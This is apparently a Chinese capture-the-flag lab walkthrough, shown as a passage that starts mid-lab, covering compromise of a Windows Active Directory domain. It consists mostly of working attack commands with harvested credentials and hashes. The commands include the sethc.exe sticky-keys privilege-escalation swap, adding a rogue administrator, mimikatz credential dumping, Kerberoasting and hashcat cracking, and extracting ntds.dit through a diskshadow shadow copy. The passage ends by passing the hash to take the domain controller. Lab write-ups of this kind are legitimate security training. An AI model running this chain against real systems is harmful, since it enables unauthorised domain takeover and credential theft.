--sysdba: 使用 SYSDBA 权限连接到数据库, SYSDBA 是 Oracle 数据库中的高特权角色,授予对数据库的完全管理访问权限,并且通常能够执行作系统命令。
--exec: 执行shell命令
添加完管理员账号之后直接rdp连接上去
proxychains4 xfreerdp /u:xpw /p:123qwe! /v:172.22.14.31 /drive:share,/mnt/xpw/kali_shard
可以直接查看flag
SeRestorePrivilege提权
之前git clone的项目里面还有一个存储了很多账户的文件
internal-secret/credentials.txt
找到一个 XR-0923的账号密码, 前面fscan扫内网可以扫到这个主机
172.22.14.46 XIAORANG\XR-0923
用这个用户名rdp上去 (权限不足无法查看flag)
proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard
查看一下这个用户的一些信息
whoami /priv #查看用户的特权
net user zhangshuai #查看用户的详细信息
会发现用户在Remote Management Users组内(远程管理用户组)
可以通过WinRM协议进行远程管理,而evil-winrm正是利用WinRM协议的工具
默认情况下,WinRM使用端口5985(HTTP)或5986(HTTPS), 可以看到系统开放了相应的端口, 所以可以使用evil-winrm工具进行连接
evil-winrm连接
proxychains4 evil-winrm -i 172.22.14.46 -u zhangshuai -p wSbEajHzZs
会发现用户的特权还多了一些
会发现存在SeRestorePrivilege的特权,
SeRestorePrivilege是一个高权限特权,允许用户绕过文件和注册表的访问控制列表(ACL),直接修改系统文件或者编辑注册表
我们可以把cmd.exe重命名为sethc.exe,sethc.exe是Windows辅助功能的一部分,当用户在锁屏界面连按五次Shift键时,系统会以SYSTEM权限运行sethc.exe(即粘滞键程序),将cmd.exe伪装成sethc.exe,用户可以在锁屏界面触发命令提示符,并以SYSTEM权限运行, 从而完成提权
cd C:\Windows\System32
ren sethc.exe sethc.bak
ren cmd.exe sethc.exe
切换到
C:\Windows\System32目录下, 这个目录下存在很多关键的可执行文件
ren重命名文件
完成前面操作后再通过rdp远程登录上去
proxychains4 xfreerdp /u:zhangshuai /p:wSbEajHzZs /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard
通过锁定账户, 进入登录页面, 然后按5下shift 键, 触发粘滞键程序, 从而运行伪装成sethc.exe的cmd.exe, 并且是system权限
添加一个管理员账户用于rdp远程登录, 前面zhangshuai账户只是一个普通用户, 很多权限都不足, 所以需要添加一个管理员用户
type C:\Users\Administrator\flag\flag03.txt
net user xpw 123qwe! /add
net localgroup administrators xpw /add
然后再以添加的管理员账户rdp登录上去
proxychains4 xfreerdp /u:xpw /p:123qwe! /v:172.22.14.46 /drive:share,/mnt/xpw/kali_shard
mimikatz
上传一个猕猴桃, 抓取用户hash
privilege::debug
sekurlsa::logonpasswords
可以抓取到机器账户的NTLM值
31e653ce951ba9faaefbc64dcc6126f1
spn
拿着 XR-0923$ 的ntlm哈希查找SPN能找到一个tianjing用户
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11
拿tianjing用户的TGS票据
proxychains4 impacket-GetUserSPNs xiaorang.lab/'XR-0923$' -hashes ':31e653ce951ba9faaefbc64dcc6126f1' -dc-ip 172.22.14.11 -request-user tianjing
离线爆破明文
$krb5tgs$23$*tianjing$XIAORANG.LAB$xiaorang.lab/tianjing*$2a9fad23d5375b846ff6d5d6d1f48efc$44b39ad4d62380b44b66af2f769c37995611ac6d0fba46d1224f22ef3d8ca8a3139d2584325e0fe73336f8a1e96bd7d19a7e008a61ec097730feec02eb090f03b64b05123843c4a08e10e42c69a5508edca8be40f6875118055d111c04187b9bb3509201f3f4993b3d8a25b14703e8406460d44f927cf89b7c8e02c1ffa67117bef6d0cc9af2628a4e1c04f25d0fb4523f57674102c67b3d9643f60f64bde96c75c482f778fcd7cd2d86a90597098c930ff8a4b322e6adf0bf4f0a57c0b33ebd7082b271ed439b7cf7ced8b3d310ad3e21c4174a2d70b12a57cc78cd756625327d42a30d34b9c6dd179043604001a015e8be674987c89633e007b881fb773cac233e011fba4f0aad9bd78ba439ae8d0ec771553ed39b47a6e6a4068e2495dcee59d29c9f37f3e0b2089d9071a47e81f116a1b7c8b7e43a3872861aa2458c2316b304933e9a62d9e9857a9e02e67cd40db29b6605e1d5688c8c24da9d1c762b271183f9b79bed008c64cd3bed9d9c9850be4b5b56ae71753826c6e9f4f183b0ec84f60597fd44ffe55ebb80913440f42d1f789efecfe6bf0a7970178991308cc44132577769fa2e186749d4f95602dce7c1c2849882de6acd458cc4f12e36e66d20441514a7b87b397f3898dc6cfc7cb0cc7aeaa591ddb15c1624444e2cb977c001c2ad186cf0dd868fb4bfcf5a062d22a5257c23d3326f3b7b17a7328c9524f827f9bbdd346a0abde6cf99cd35b3fd4babfb39da923e8b82181104ccdcd64c015db187abe3ad9f3b0e912a4422971669d8c79293e67dc544ef0ad60401d162332066037397be93929b526abaf646435c06d5d65dca03b0647628d7f77732d9df99796dc76fc82be97580bbc83525633b7a0605dc5746230cddcd692dff8ef7d5da1bc7439a1cac14efcc61e9572dba07b95c9ae1631cc42f6ae437dd1ce8bee8b5e5e2353c94fbbc554ab4568edf20c1f3a6f5f1d7471a4de755d40c2bf043f5725b285e996ab16fb193a90774bb3d7bdbc55c348b9d336bc0519c9850e373f670eae10e89a481fc5fd6463be9dbb89acaf3e1405b8be03f6bab0d74abf4d9c4dac9762cf35f73cf964437fcd7fccbbe70760833965a970974a8dec0b3f3593c0e9c3969c5adf68c14a8d2888be837fca2311482dd260d2845d0025f8e5ec32faaf852d0f28c5425cd07f937b15f7119945dfda3738105117f32a41afaf1c6471d56a0c6c8dfbb865fe696de816fa6a17d673a419ef4a900e7f7657af74af593547655066159cd4334d0c63c5bc66dc2c981df6489735f41560834eae28358c1e83cc45af139b01e44cfb0c1ca754d7f01d752b6ab0de762dfe9e26032df3b158a2d6a060ca6c2b9372c8b11f955a2e35e6cc3bf3a44070178a1910464f5ec7bb1d3091ad277339c8717ceefc95fdd4e5885fdd108add441785ed27a6d6d5ad96fad59a3a4205b4e2ac7d0d63535243c850d6a2c1d
hashcat -m 13100 -a 0 hash.txt /usr/share/wordlists/rockyou.txt --force
爆出明文DPQSXSXgh2
卷影拷贝提取SAM
可以通过evil-winrm连上去
proxychains4 evil-winrm -i 172.22.14.11 -u tianjing -p DPQSXSXgh2
存在 SeBackupPrivilege 和 SeRestorePrivilege 特权
有备份以及还原文件或目录的权限,可以卷影拷贝然后下载ntds.dit文件
本地创一个raj.dsh,写入
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
接着用unix2dos raj.dsh转化格式
前面evil-winrm连上去的切换到C目录,然后创一个test文件夹切换过去(不然后面会没权限),把本地的raj.dsh上传上去
mkdir test
cd test
upload raj.dsh
diskshadow /s raj.dsh
复制到到当前目录,也就是我们创建的这个test目录
RoboCopy /b z:\windows\ntds . ntds.dit
把ntds.dit下下来 (速度比较慢)
download ntds.dit
接下来下载system(用的是SeRestorePrivilege特权)
reg save HKLM\SYSTEM system
download system
最后用下载下来的ntds.dit和system本地进行解密
impacket-secretsdump -ntds ntds.dit -system system local
70c39b547b7d8adec35ad7c09fb1d277
pth拿下域控
proxychains4 impacket-smbexec -hashes :70c39b547b7d8adec35ad7c09fb1d277 xiaorang.lab/administrator@172.22.14.11 -codec gbk
或者
proxychains4 evil-winrm -i 172.22.14.11 -u Administrator -H "70c39b547b7d8adec35ad7c09fb1d277"
参考文章
https://fushuling.com/index.php/2023/10/10/%e6%98%a5%e7%a7%8b%e4%ba%91%e5%a2%83%c2%b7privilege/
https://zer0peach.github.io/2024/12/27/%E6%98%A5%E7%A7%8B%E4%BA%91%E9%95%9C-privilege-writeup/